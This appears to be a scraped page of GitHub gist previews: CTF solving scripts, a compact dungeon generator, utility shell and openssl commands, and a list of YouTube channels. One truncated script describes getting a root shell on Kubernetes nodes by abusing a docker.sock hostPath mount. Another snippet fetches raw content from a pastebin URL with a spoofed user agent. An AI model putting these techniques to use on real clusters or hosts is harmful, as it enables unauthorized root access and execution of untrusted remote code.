image_extract.pyperforms character extraction on targetted against the HackerOne H1-702 CTF announcement imagedecrypt_sqli.pyperforms blind sqli data extraction with encrypted payloads targetting against the FliteThermostat APItiming_attack.pyperforms an HTTP piplining based timing against the FliteThermostat Backendwordlist_generator.pygenerates wordlists from a give corpus or set of corpuseshttplib.pyperforms efficient asynchronous HTTP requests against the FliteThermostat Backend
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [dependencies] | |
| sgx-isa = { version = "0.2", features = ["sgxstd"] } | |
| # RustCrypto, used for CMAC | |
| cmac = "0.2.0" | |
| crypto-mac = "0.7.0" | |
| aes = "0.3.2" | |
| block-cipher-trait = "0.6.2" | |
| generic-array = "0.12" |
ajxchapman
/ README.md
Last active
October 22, 2023 16:05
Scripts developed for solving HackerOne H1-702 2019 CTF
ricardodeazambuja
/ webcam-to-numpy-array-from-your-browser-in-colab.ipynb
Last active
April 22, 2020 13:29
Webcam to Numpy array from your browser in Colab
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
munificent
/ generate.c
Last active
August 29, 2025 13:51
A random dungeon generator that fits on a business card
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <time.h> // Robert Nystrom | |
| #include <stdio.h> // @munificentbob | |
| #include <stdlib.h> // for Ginny | |
| #define r return // 2008-2019 | |
| #define l(a, b, c, d) for (i y=a;y\ | |
| <b; y++) for (int x = c; x < d; x++) | |
| typedef int i;const i H=40;const i W | |
| =80;i m[40][80];i g(i x){r rand()%x; | |
| }void cave(i s){i w=g(10)+5;i h=g(6) | |
| +3;i t=g(W-w-2)+1;i u=g(H-h-2)+1;l(u |
jonlabelle
/ exec_with_retry.sh
Created
January 27, 2019 00:01
Bash script to execute a command and (exponentially) retry if it fails.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| set -e | |
| # | |
| # Executes a command and (exponentially) retries if it fails. | |
| # | |
| # Usage: | |
| # | |
| # exec_with_retry <command> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const Promise = require('bluebird'); | |
| const request = require('request'); | |
| const requestAsync = Promise.promisify(request); | |
| const USER = process.env.GITHUB_USER; | |
| exports.handler = async (event, context) => { | |
| try { | |
| if (!USER) throw new Error('GITHUB_USER env missing'); | |
| const module = event.pathParameters.module; |
jjo
/ kubectl-root-in-host-nopriv.sh
Last active
June 27, 2025 23:24
Yeah. Get a root shell at any Kubernetes *node* via `privileged: true` + `nsenter` sauce. PodSecurityPolicy will save us. DenyExecOnPrivileged didn't (kubectl-root-in-host-nopriv.sh exploits it)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # Launch a Pod ab-using a hostPath mount to land on a Kubernetes node cluster as root | |
| # without requiring `privileged: true`, in particular can abuse `DenyExecOnPrivileged` | |
| # admission controller. | |
| # Pod command in turn runs a privileged container using node's /var/run/docker.sock. | |
| node=${1} | |
| case "${node}" in | |
| "") | |
| nodeSelector='' | |
| podName=${USER+${USER}-}docker-any |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| try { | |
| var https = require("https"); | |
| https | |
| .get( | |
| { | |
| hostname: "pastebin.com", | |
| path: "/raw/XLeVP82h", | |
| headers: { | |
| "User-Agent": | |
| "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0", |
openssl genrsa -out self-ssl.key
openssl req -new -key self-ssl.key -out self-ssl.csr -config csr.conf
openssl x509 -req -days 365 -in self-ssl.csr -signkey self-ssl.key -out self-ssl.crt -extensions req_ext -extfile csr.conf
Sign from Root CA:
openssl x509 -req -days 365 -extensions req_ext -extfile csr.conf -CA RootCA.crt -CAkey RootCA.key -in self-ssl.csr -out self-ssl.crt
- Brainiac75 - Magnets
- Cody'sLab - Chemistry, Metallurgy, Physics
- colinfurze - Mechanics, Metalworking, Woodworking, Pyrotechnics
- DemolitionRanch - Guns
- ElectroBOOM - Electricity
- KREOSAN - Electricity
- Kurzgesagt - Philosophy, Physics
- MegaBots Inc - Robotics
- NileRed - Chemistry
- NurdRage - Chemistry